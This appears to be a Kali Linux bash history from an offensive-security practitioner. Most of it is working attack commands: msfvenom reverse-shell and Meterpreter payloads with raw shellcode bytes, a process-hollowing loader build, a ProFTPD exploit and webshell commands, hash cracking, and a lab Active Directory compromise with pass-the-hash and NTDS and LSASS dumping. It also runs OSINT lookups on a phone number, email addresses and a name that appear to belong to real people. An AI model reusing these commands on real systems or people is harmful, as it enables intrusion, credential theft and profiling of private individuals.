    1  ls
    2  sudo dpkg-reconfigure keyboard-configuration
    3  reboot
    4  ls
    5  cd 
    6  ls
    7  cd Desktop
    8  ls
    9  sudo host Alpha
   10  ls
   11  sudo hostname alpha
   12  ls
   13  cd 
   14  ls
   15  ip a
   16  nmap -o 192.168.80.
   17  nmap -o 192.168.80.0
   18  sudo shutdown
   19  sudo apt update
   20  ls
   21  rm 192.168.80.
   22  ls
   23  rm 192.168.80.0
   24  ls
   25  cd D
   26  cd Desktop
   27  ls
   28  mkdir dockali
   29  cd dockali
   30  ls
   31  ip a
   32  nmap 192.168.80.0 -O
   33  nmap 192.168.80.0 -sS
   34  nmap -v -A -sV 192.168.80.0
   35  nmap -sL 192.168.80.0
   36  rustcan -a 192.168.80.0
   37  nmap -Pn 192.168.80.0/24
   38  ^[[200~nmap -Pn -sn 192.168.80.0/24
   39  nmap -Pn -sn 192.168.80.0/24
   40  nmap -Pn -sn 192.168.80.0/24\n
   41  nmap -sn -PR 192.168.80.0/24\n
   42  nmap -sn -PR 192.168.80.132/24\n
   43  nmap -sn -PR 192.168.80.0/24\n
   44  nmap -Pn 192.168.80.132\n
   45  nmap -Pn -p 22 -sV 192.168.80.132\n
   46  sudo ubuntu@192.168.80.132
   47  sudo ssh ubuntu@192.168.80.132
   48  ls
   49  nano aes.py
   50  nano xor.py
   51  python3 aes.py WET_TEAM.exe
   52  sudo apt install python3-pip
   53  python3 aes.py WET_TEAM.exe
   54  ls
   55  sudo apt update\nsudo apt install -y python3-pycryptodome\n
   56  python3 aes.py WET_TEAM.exe
   57  python3 -m pip install --user pycryptodome\n
   58  sudo apt install -y python3-pip\n
   59  python3 aes.py WET_TEAM.exe
   60  which python3\npython3 -V\npython3 -m pip -V\n
   61  python3 aes.py WET_TEAM.exe
   62  sudo apt install -y python3-venv\npython3 -m venv crypto-env\nsource crypto-env/bin/activate\n
   63  pip install pycryptodome\n
   64  python3 aes.py WET_TEAM.exe
   65  ls
   66  exit
   67  sliver-client
   68  ls
   69  cd Desktop
   70  ls
   71  sudo apt update
   72  sudo apt install sliver
   73  sliver-client version\n
   74  scp ubuntu@IP_UBUNTU:/home/ubuntu/.sliver-client/configs/ubuntu_localhost.cfg .\n
   75  scp ubuntu@192.168.80.132:/home/ubuntu/.sliver-client/configs/ubuntu_localhost.cfg .\n
   76  sliver-client import ubuntu_localhost.cfg\n
   77  sliver-client\n
   78  ip a
   79  scp ubuntu@192.168.80.132:/home/ubuntu/kali_192.168.80.132.cfg .\n
   80  sudo scp ubuntu@192.168.80.132:/home/ubuntu/kali_192.168.80.132.cfg .\n
   81  sliver-client import kali_192.168.80.132.cfg\n
   82  scp ubuntu@192.168.80.132:/home/ubuntu/kali_192.168.80.132.cfg .\n
   83  sliver-client import kali_192.168.80.132.cfg
   84  sliver-client
   85  sliver-server
   86  ip a
   87  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.80.131 LPORT=8080 EXITFUNC=thread -f csharp
   88  x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,
   89  0xd5,0x49,0xff,0xce,0xe9,0x3c,0xff,0xff,0xff,0x48,0x01,0xc3,
   90  0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,
   91  msfconsole -q
   92  phoneinfoga scan -n "+33767872939"
   93  sudo apt update\nsudo apt install -y docker.io\nsudo systemctl start docker\nsudo systemctl enable docker\n
   94  docker run --rm sundowndev/phoneinfoga scan -n "+33767872939"\n
   95  sudo docker run --rm sundowndev/phoneinfoga scan -n "+33767872939"\n
   96  Digest: sha256:b9c0eceea4048c7d8b0486d89bd9037193dc6fa38b8932794d4e9b751c28c655
   97  Status: Downloaded newer image for sundowndev/phoneinfoga:latest
   98  Running scan for phone number +33767872939...
   99  Results for googlesearch
  100  Social media:
  101  Disposable providers:
  102  sudo apt update\nsudo apt install -y open-vm-tools open-vm-tools-desktop\nsudo reboot\n
  103  xfconf-query -c xsettings -p /Gtk/CursorThemeName -s Adwaita\nxfconf-query -c xsettings -p /Gtk/CursorThemeSize -s 24\n
  104  sudo apt update\nsudo apt install -y adwaita-icon-theme\n
  105  sudo update-alternatives --config x-cursor-theme\n
  106  reboot
  107  sherlock
  108  sudo apt install sherlock -y
  109  ls
  110  cd Desktop
  111  ls
  112  cd exit
  113  cd ..
  114  ls
  115  python3 --version\n
  116  git clone https://github.com/megadose/holehe.git\ncd holehe\npip3 install -r requirements.txt
  117  sudo apt install -y python3-venv\n
  118  source venv/bin/activate\n
  119  python3 -m venv venv\n
  120  ls
  121  cd holehe
  122  ls
  123  cd ..
  124  ls
  125  source venv/bin/activate\n
  126  pip install -r requirements.txt\n
  127  pip install .\n
  128  holele lilo.bennardo@gmail.com
  129  holehe lilo.bennardo@gmail.com
  130  pip install requests\n
  131  holehe lilo.bennardo@gmail.com
  132  ls
  133  holehe sclaparil@neuf.fr
  134  holehe calbennardo@gmail.com
  135  sherlock charly.bennardo
  136  clear
  137  ls
  138  rm charly.bennardo.txt
  139  ls
  140  clear
  141  ls
  142  exit
  143  ls
  144  cd process
  145  ls
  146  chmod +x build.sh && ./build.sh
  147  ls
  148  lsmsfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 0.0.0.0; set LPORT 8080; run"\n
  149  msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 0.0.0.0; set LPORT 8080; run"\n
  150  ^[[200~msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 192.168.80.131; set LPORT 8080; run"
  151  msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 192.168.80.131; set LPORT 8080; run"
  152  ^[[200~cd ProcessHollowing
  153  dotnet new console --force -o . > /dev/null 2>&1
  154  cp ../ProcessHollowing.cs Program.cs   # APRÈS dotnet new
  155  dotnet publish ...
  156  ^[[200~cd ~/process/ProcessHollowing
  157  cd ~/process/ProcessHollowing
  158  ^[[200~cp ~/process/ProcessHollowing.cs Program.cs
  159  cp ~/process/ProcessHollowing.cs Program.cs
  160  dotnet publish -p:PublishSingleFile=true -r win-x64 -c Release --self-contained true -p:PublishTrimmed=true\n
  161  cp $(find bin -name "ProcessHollowing.exe") ~/process/ProcessHollowing.exe\n
  162  cp bin/Release/net6.0/win-x64/publish/ProcessHollowing.exe ~/process/ProcessHollowing.exe\n
  163  msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 192.168.80.131; set LPORT 8080; run"
  164  ping 192.168.0.28
  165  ls
  166  mv /home/kali/shell.exe /home/kali/Downloads/text.exe
  167  cd /home/kali/Downloads
  168  ls
  169  build_loadthat.sh
  170  chmod +x build_loadthat.sh && ./build_loadthat.sh
  171  ^[[200~sudo apt install mingw-w64 -y
  172  sudo apt install mingw-w64 -y
  173  ./build_loadthat.sh\n
  174  ls
  175  shutdown
  176  sudo apt update
  177  ls
  178  ip a
  179  msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.80.131 LPORT=4444 -f exe -o shell.exe
  180  ls
  181  ^[[200~msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=peertube.lestutosdeprocessus.fr LPORT=8080 EXITFUNC=thread -f csharp
  182  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.80.131 LPORT=8080 EXITFUNC=thread -f csharp
  183  x41,0xba,
  184  0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0x49,0xff,
  185  0xce,0x75,0xe5,0xe8,0x93,0x00,0x00,0x00,0x48,0x83,0xec,0x10,
  186  0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x04,0x41,0x58,0x48,0x89,
  187  0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,
  188  0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,
  189  0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,
  190  0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,
  191  0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,
  192  0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,
  193  0x83,0xf8,0x00,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x00,0x40,
  194  0x00,0x00,0x41,0x58,0x6a,0x00,0x5a,0x41,0xba,0x0b,0x2f,0x0f,
  195  0x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,
  196  0xd5,0x49,0xff,0xce,0xe9,0x3c,0xff,0xff,0xff,0x48,0x01,0xc3,
  197  0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,
  198  0x6a,0x00,0x59,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0x89,0xda,0xff,
  199  ls
  200  nano text.txt
  201  python3 -m http.server 8080
  202  pwd
  203  ls
  204  scp kali@192.168.80.131:/home/kali/text.txt C:\Users\WavyCorp\Desktop\\nkali
  205  sudo service ssh start
  206  sudo service ssh startd
  207  ls
  208  cd Downloads
  209  ls
  210  build_loadthat.sh
  211  ip a
  212  ufw status
  213  ss -tlnp | grep 8080
  214  ping 172.28.128.3
  215  nmap -sV -sC 172.28.128.3
  216  nmap -sV --open -T4 172.28.128.3
  217  nmap -sS -T2 172.28.128.3
  218  ip a
  219  ping 192.168.0.12
  220  sudo dhclient eth0\nip a
  221  sudo dhcpcd eth0
  222  ip a
  223  sudo ip link set eth0 up\nsudo systemctl restart NetworkManager\nip a
  224  sudo ip link set eth0 down\nsudo ip link set eth0 up\nsleep 3\nip a
  225  sudo systemctl restart NetworkManager\nip a
  226  sudo reboot
  227  ip a
  228  sudo systemctl restart NetworkManager\nsleep 3\nip a
  229  sudo ip link set eth0 up\nsudo ip addr add 192.168.0.50/24 dev eth0\nsudo ip route add default via 192.168.0.1\nip a
  230  ping 192.168.0.12
  231  ip route
  232  sudo ip route add default via 192.168.0.1\nping 192.168.0.12
  233  sudo systemctl restart NetworkManager\nip a
  234  ip a
  235  ping 192.168.0.12
  236  nmap -sV -T4 192.168.0.12
  237  msfconsole\nsearch proftpd\nuse exploit/unix/ftp/proftpd_modcopy_exec\nset RHOSTS 192.168.0.12\nset SITEPATH /var/www/html\nrun
  238  ip a
  239  john --show --format=md5crypt hashes.txt
  240  cat ~/.john/john.pot
  241  john --show --format=md5crypt hashes.txt
  242  cat > hashes_clean.txt << 'EOF'\nleia_organa:$1$N6DIbGGZ$LpERCRfi8IXlNebhQuYLK/\nluke_skywalker:$1$/7D550zb$Y/akb.UNrDS2w7nZVq.Ll/\nhan_solo:$1$6jIF3qTC$7jEXfQsNENuWYe06cK7m1.\ndarth_vader:$1$rLuMkR1R$YHumHRxhswnf07eTUUfHJ.\nchewbacca:$1$.qt4t8zH$RdKbdafuqc7rYiDXSoQCI.\nEOF\n\njohn --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt hashes_clean.txt
  243  curl "http://192.168.0.12/zHP6PHS.php"
  244  curl "http://192.168.0.12/zHP6PHS.php?cmd=id"
  245  nc -lvnp 4444
  246  sudo ip route add 192.168.0.0/24 via 192.168.80.2
  247  ping 192.168.0.12
  248  # Sauvegarde les hashes\necho 'vagrant:$6$NABMNgxO$T2lvEhArj0ImjvROySq8vka/r8MWhhzNgT3Z5FS1LcPS5D325ESK5LjFJymb2jo/m4NmDg8aEl0TWWI3la.Y3/' > hashes.txt\necho 'leia_organa:$1$N6DIbGGZ$LpERCRfi8IXlNebhQuYLK/' >> hashes.txt\necho 'luke_skywalker:$1$/7D550zb$Y/akb.UNrDS2w7nZVq.Ll/' >> hashes.txt\n\n# Craque avec rockyou\njohn --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
  249  sudo gunzip /usr/share/wordlists/rockyou.txt.gz\njohn --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
  250  john --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt\njohn --show hashes.txt
  251  cat >> hashes.txt << 'EOF'\nhan_solo:$1$6jIF3qTC$7jEXfQsNENuWYe06cK7m1.\nartoo_detoo:$1$tfvzyRnv$mawnXAR4GgABt8rtn7Dfv.\nc_three_pio:$1$1Xx7tKuo$xuM4AxkByTUD78BaJdYdG.\nben_kenobi:$1$5nfRD/bA$y7ZZD0NimJTbX9FtvhHJX1\ndarth_vader:$1$rLuMkR1R$YHumHRxhswnf07eTUUfHJ.\nanakin_skywalker:$1$jlpeszLc$PW4IPiuLTwiSH5YaTlRaB0\njarjar_binks:$1$SNokFi0c$F.SvjZQjYRSuoBuobRWMh1\nlando_calrissian:$1$Af1ek3xT$nKc8jkJ30gMQWeW/6.ono0\nboba_fett:$1$TjxlmV4j$k/rG1vb4.pj.z0yFWJ.ZD0\njabba_hutt:$1$9rpNcs3v$//v2ltj5MYhfUOHYVAzjD/\ngreedo:$1$vOU.f3Tj$tsgBZJbBS4JwtchsRUW0a1\nchewbacca:$1$.qt4t8zH$RdKbdafuqc7rYiDXSoQCI.\nkylo_ren:$1$rpvxsssI$hOBC/qL92d0GgmD/uSELx.\nEOF
  252  john --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
  253  use exploit/unix/ftp/proftpd_modcopy_exec\nset RHOSTS 192.168.0.12\nset SITEPATH /var/www/html\nset payload cmd/unix/bind_netcat\nset LHOST 192.168.80.131\nrun
  254  ip a
  255  msfconsole
  256  curl "http://192.168.0.12/zHP6PHS.php?0=whoami"
  257  ip a
  258  sudo ip route add 192.168.0.0/24 via 192.168.80.2\nping 192.168.0.12
  259  # Sur Kali - terminal séparé\ncd /tmp\nwget https://github.com/berdav/CVE-2021-4034/archive/main.zip\nunzip main.zip\ncd CVE-2021-4034-main\npython3 -m http.server 8000
  260  ls
  261  ipconfig
  262  ip a
  263  nmap -sV -T4 192.168.0.0/24
  264  nmap -sS -T2 -p- --open 192.168.0.0/24
  265  nmap -sS -T2 -F --open 192.168.0.0/24
  266  ip a
  267  ip q
  268  ip a
  269  sudo dhclient eth0
  270  sudo dhcpcd eth0
  271  ip a
  272  sudo systemctl restart NetworkManager\nsleep 3\nip a
  273  nmap -sS -T4 -F --open 192.168.253.0/24
  274  nmap -sn 192.168.253.0/24
  275  sudo apt update
  276  ip 
  277  ip a
  278  # Vérifier que eth1 a une IP\nip a\n\n# Relancer apt\nsudo apt update
  279  sudo apt install -y \\n  nmap masscan netdiscover \\n  smbclient smbmap \\n  ldap-utils \\n  bloodhound neo4j \\n  responder \\n  john hashcat \\n  exiftool \\n  dnsenum dnsrecon \\n  wine
  280  for tool in nmap masscan netdiscover smbclient smbmap ldapsearch bloodhound neo4j responder john hashcat exiftool dnsenum dnsrecon wine; do\n  if command -v $tool &>/dev/null; then\n    echo "✓ $tool"\n  else\n    echo "✗ $tool — NON INSTALLÉ"\n  fi\ndone
  281  pipx install certipy-ad
  282  # Étape 1 — dépendances (depuis HELP.md officiel)\nsudo apt-get -y install gcc clang libclang-dev libgssapi-krb5-2 libkrb5-dev libsasl2-modules-gssapi-mit musl-tools gcc-mingw-w64-x86-64\n\n# Étape 2 — Rust/Cargo si absent\ncurl https://sh.rustup.rs -sSf | sh\nsource ~/.cargo/env\n\n# Étape 3 — install\ncargo install rusthound-ce\n\n# Vérification\nrusthound-ce --help
  283  sudo apt install bloodhound-ce-python -y
  284  sudo apt install crackmapexec -y
  285  gem install evil-winrm
  286  echo "=== RECON ===" && \\nfor tool in nmap masscan netdiscover dnsenum dnsrecon; do command -v $tool &>/dev/null && echo "✓ $tool" || echo "✗ $tool"; done && \\n\necho "=== SMB/LDAP ===" && \\nfor tool in smbclient smbmap ldapsearch rpcclient enum4linux; do command -v $tool &>/dev/null && echo "✓ $tool" || echo "✗ $tool"; done && \\n\necho "=== KERBEROS/AD ===" && \\nfor tool in kerbrute impacket-GetNPUsers impacket-secretsdump impacket-GetUserSPNs bloodhound-ce-python rusthound-ce; do command -v $tool &>/dev/null && echo "✓ $tool" || echo "✗ $tool"; done && \\n\necho "=== EXPLOIT ===" && \\nfor tool in msfconsole responder evil-winrm crackmapexec certipy; do command -v $tool &>/dev/null && echo "✓ $tool" || echo "✗ $tool"; done && \\n\necho "=== POST EXPLOIT ===" && \\nfor tool in bloodhound neo4j john hashcat exiftool wine; do command -v $tool &>/dev/null && echo "✓ $tool" || echo "✗ $tool"; done && \\n\necho "=== PEASS ===" && \\nls ~/pentest/06_loot/linpeas.sh ~/pentest/06_loot/winPEASx64.exe 2>/dev/null && echo "✓ linpeas/winpeas" || echo "✗ linpeas/winpeas"
  287  pipx install enum4linux-ng
  288  git clone https://github.com/cddmp/enum4linux-ng.git\ncd enum4linux-ng\npip install -r requirements.txt --break-system-packages\nsudo cp enum4linux-ng.py /usr/local/bin/enum4linux-ng\nchmod +x /usr/local/bin/enum4linux-ng
  289  # Vérification\nenum4linux-ng --help
  290  sudo chmod +x /usr/local/bin/enum4linux-ng\nenum4linux-ng --help
  291  wget https://github.com/ropnop/kerbrute/releases/latest/download/kerbrute_linux_amd64 -O kerbrute\nchmod +x kerbrute && sudo mv kerbrute /usr/local/bin/
  292  mkdir -p ~/pentest/06_loot\nwget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -O ~/pentest/06_loot/linpeas.sh\nwget https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASx64.exe -O ~/pentest/06_loot/winPEASx64.exe\nchmod +x ~/pentest/06_loot/linpeas.sh
  293  echo "=== RECON ===" && \\nfor tool in nmap masscan netdiscover dnsenum dnsrecon; do command -v $tool &>/dev/null && echo "✓ $tool" || echo "✗ $tool"; done && \\necho "=== SMB/LDAP ===" && \\nfor tool in smbclient smbmap ldapsearch rpcclient enum4linux-ng; do command -v $tool &>/dev/null && echo "✓ $tool" || echo "✗ $tool"; done && \\necho "=== KERBEROS/AD ===" && \\nfor tool in kerbrute impacket-GetNPUsers impacket-secretsdump impacket-GetUserSPNs bloodhound-ce-python rusthound-ce; do command -v $tool &>/dev/null && echo "✓ $tool" || echo "✗ $tool"; done && \\necho "=== EXPLOIT ===" && \\nfor tool in msfconsole responder evil-winrm crackmapexec certipy; do command -v $tool &>/dev/null && echo "✓ $tool" || echo "✗ $tool"; done && \\necho "=== POST EXPLOIT ===" && \\nfor tool in bloodhound neo4j john hashcat exiftool wine; do command -v $tool &>/dev/null && echo "✓ $tool" || echo "✗ $tool"; done && \\necho "=== PEASS ===" && \\nls ~/pentest/06_loot/linpeas.sh ~/pentest/06_loot/winPEASx64.exe 2>/dev/null && echo "✓ linpeas/winpeas" || echo "✗ linpeas/winpeas"
  294  # winPEASx64.exe manquant\nwget https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASx64.exe -O ~/pentest/06_loot/winPEASx64.exe
  295  ls
  296  pw
  297  pwd
  298  cd ..
  299  l
  300  ls
  301  mkdir vpn
  302  cd vpn
  303  ls
  304  cd ..
  305  ls
  306  cd vpn
  307  # Connexion VPN\nsudo openvpn ~/lilo.ovpn
  308  # Vérifie où est le fichier\nfind / -name "*.ovpn" 2>/dev/null\n\n# Puis connecte avec le bon chemin\nsudo openvpn /chemin/vers/lilo.ovpn
  309  find / -name "*.ovpn" 2>/dev/null
  310  sudo openvpn /home/kali/vpn/lilo.ovpn\n
  311  cd ..
  312  ls
  313  cd Desktop
  314  mkdir lab GOAD
  315  ls
  316  cd GOAD
  317  nano recon.txt
  318  ls
  319  cd D
  320  cd Desktop
  321  cd GOAD
  322  ls
  323  python3 -m http.server 8080
  324  sudo apt install open-vm-tools -y
  325  ls /mnt/hgfs
  326  sudo apt install open-vm-tools open-vm-tools-desktop -y
  327  sudo vmhgfs-fuse .host:/ /mnt/hgfs -o allow_other
  328  \n
  329  ip a show tun0
  330  nmap -sn 192.168.56.0/24
  331  ping -c2 192.168.56.10 192.168.56.11 192.168.56.22 192.168.56.100
  332  sudo nmap -T4 -F -O 192.168.56.10 192.168.56.11 192.168.56.22 192.168.56.100 -oN ~/pentest/scans/goad_fast.txt
  333  nmap -sn 192.168.56.0/24
  334  nmap -T5 192.168.56.0/24
  335  map scan report for 192.168.56.10
  336  Host is up (0.020s latency).
  337  Not shown: 985 closed tcp ports (reset)
  338  PORT     STATE SERVICE
  339  53/tcp   open  domain
  340  80/tcp   open  http
  341  88/tcp   open  kerberos-sec
  342  135/tcp  open  msrpc
  343  139/tcp  open  netbios-ssn
  344  389/tcp  open  ldap
  345  445/tcp  open  microsoft-ds
  346  464/tcp  open  kpasswd5
  347  593/tcp  open  http-rpc-epmap
  348  636/tcp  open  ldapssl
  349  3268/tcp open  globalcatLDAP
  350  3269/tcp open  globalcatLDAPssl
  351  3389/tcp open  ms-wbt-server
  352  5985/tcp open  wsman
  353  5986/tcp open  wsmans
  354  Nmap scan report for 192.168.56.11
  355  Host is up (0.019s latency).
  356  Not shown: 986 closed tcp ports (reset)
  357  PORT     STATE SERVICE
  358  53/tcp   open  domain
  359  88/tcp   open  kerberos-sec
  360  135/tcp  open  msrpc
  361  139/tcp  open  netbios-ssn
  362  389/tcp  open  ldap
  363  445/tcp  open  microsoft-ds
  364  464/tcp  open  kpasswd5
  365  593/tcp  open  http-rpc-epmap
  366  636/tcp  open  ldapssl
  367  3268/tcp open  globalcatLDAP
  368  3269/tcp open  globalcatLDAPssl
  369  3389/tcp open  ms-wbt-server
  370  5985/tcp open  wsman
  371  5986/tcp open  wsmans
  372  netexec
  373  nmap -T5 -sS -sV -O 192.168.56.0/24
  374  sudo apt install open-vm-tools open-vm-tools-desktop -y
  375  reboot
  376  nano recon02.txt
  377  ls
  378  nano enum.txt
  379  ls
  380  nano smbclient.txt
  381  nano exploit.txt
  382  cp ~/Desktop/GOAD/exploit.txt /mnt/hgfs/fichierpartageKali/
  383  netexec smb 192.168.56.22 -u jeor.mormont -p '_L0ngCl@w_' --sam
  384  netexec smb 192.168.56.22 -u jeor.mormont -p '_L0ngCl@w_' --lsa
  385  SamLsa.txt
  386  nano SamLsa.txt
  387  cp ~/Desktop/GOAD/SamLsa.txt /mnt/hgfs/fichierpartageKali/
  388  netexec smb 192.168.56.10 192.168.56.11 192.168.56.22 -u sql_svc -p 'YouWillNotKerboroast1ngMeeeeee'
  389  netexec smb 192.168.56.22 \ -u Administrator \ -H dbd13e1c4e338284ac4e9874f7de6ef4 \ --local-auth
  390  netexec mssql 192.168.56.22  -u sql_svc -p 'YouWillNotKerboroast1ngMeeeeee'
  391  netexec mssql 192.168.56.22 -u sql_svc -p 'YouWillNotKerboroast1ngMeeeeee' -x "whoami"
  392  netexec mssql 192.168.56.22 -u sql_svc -p 'YouWillNotKerboroast1ngMeeeeee' -x "whoami /priv"
  393  netexec mssql 192.168.56.22 -u sql_svc -p 'YouWillNotKerboroast1ngMeeeeee' -x "whoami /all"
  394  nano mssql.txt
  395  cp ~/Desktop/GOAD/mssql.txt /mnt/hgfs/fichierpartageKali/
  396  wget https://github.com/BeichenDream/GodPotato/releases/latest/download/GodPotato-NET4.exe \\n-O ~/Desktop/GOAD/GodPotato.exe
  397  nano godpatato.txt
  398  cp ~/Desktop/GOAD/godpatato.txt /mnt/hgfs/fichierpartageKali/
  399  netexec winrm 192.168.56.11 -u sql_svc -p 'YouWillNotKerboroast1ngMeeeeee'
  400  netexec smb 192.168.56.11 \\n-u Administrator \\n-H dbd13e1c4e338284ac4e9874f7de6ef4 \\n--local-auth
  401  hashcat -m 2100 '$DCC2$10240#robb.stark#f19bfb9b10ba923f2e28b733e5dd1405' \\n/usr/share/wordlists/rockyou.txt
  402  cp ~/Desktop/GOAD/analyse.txt /mnt/hgfs/fichierpartageKali/
  403  impacket-GetUserSPNs -request \\n-outputfile ~/Desktop/GOAD/hashes.kerberoast \\n-dc-ip 192.168.56.11 \\nnorth.sevenkingdoms.local/brandon.stark:iseedeadpeople
  404  cat ~/Desktop/GOAD/hashes.kerberoast
  405  john ~/Desktop/GOAD/hashes.kerberoast --wordlist=/usr/share/wordlists/rockyou.txt
  406  john ~/Desktop/GOAD/hashes.kerberoast --show
  407  nano exploitServer11.txt
  408  cp ~/Desktop/GOAD/exploitServer11.txt /mnt/hgfs/fichierpartageKali/
  409  sudo nano /etc/hosts
  410  bloodhound-python -u 'jeor.mormont' -p '_L0ngCl@w_' -d north.sevenkingdoms.local \\n-dc WINTERFELL.north.sevenkingdoms.local -ns 192.168.56.11 -c All --zip
  411  nxc smb 192.168.56.22 -u 'jeor.mormont' -p '_L0ngCl@w_' -d north.sevenkingdoms.local --sam --lsa
  412  nxc smb 192.168.56.11 -u 'sql_svc' -p 'YouWillNotKerboroast1ngMeeeeee' -d north.sevenkingdoms.local
  413  nxc mssql 192.168.56.22 -u 'sql_svc' -p 'YouWillNotKerboroast1ngMeeeeee' -d north.sevenkingdoms.local --xcmd 'whoami'
  414  nxc smb 192.168.56.11 -u 'sql_svc' -p 'YouWillNotKerboroast1ngMeeeeee' -d north.sevenkingdoms.local --shares
  415  nxc winrm 192.168.56.11 -u 'sql_svc' -p 'YouWillNotKerboroast1ngMeeeeee' -d north.sevenkingdoms.local
  416  nxc smb 192.168.56.22 -u 'jeor.mormont' -p '_L0ngCl@w_' -d north.sevenkingdoms.local --lsass
  417  nano pivot.txt
  418  cp ~/Desktop/GOAD/pivot.txt /mnt/hgfs/fichierpartageKali/
  419  nxc smb 192.168.56.11 -u 'Administrator' -H 'dbd13e1c4e338284ac4e9874f7de6ef4' --ntds
  420  nxc smb 192.168.56.11 -u 'Administrator' -H 'dbd13e1c4e338284ac4e9874f7de6ef4' -M ntdsutil
  421  nxc smb 192.168.56.11 -u 'Administrator' -H 'dbd13e1c4e338284ac4e9874f7de6ef4' --ntds --user krbtgt
  422  nxc smb 192.168.56.11 -u 'Administrator' -H 'dbd13e1c4e338284ac4e9874f7de6ef4' --lsass
  423  nxc smb 192.168.56.11 -u 'Administrator' -H 'dbd13e1c4e338284ac4e9874f7de6ef4' -M lsass
  424  nxc smb 192.168.56.11 -u 'Administrator' -H 'dbd13e1c4e338284ac4e9874f7de6ef4' -M lsassy
  425  cp ~/Desktop/GOAD/certipy01.txt /mnt/hgfs/fichierpartageKali/
  426  sudo sh -c "echo '192.168.56.10 kingslanding.sevenkingdoms.local sevenkingdoms.local' >> /etc/hosts"
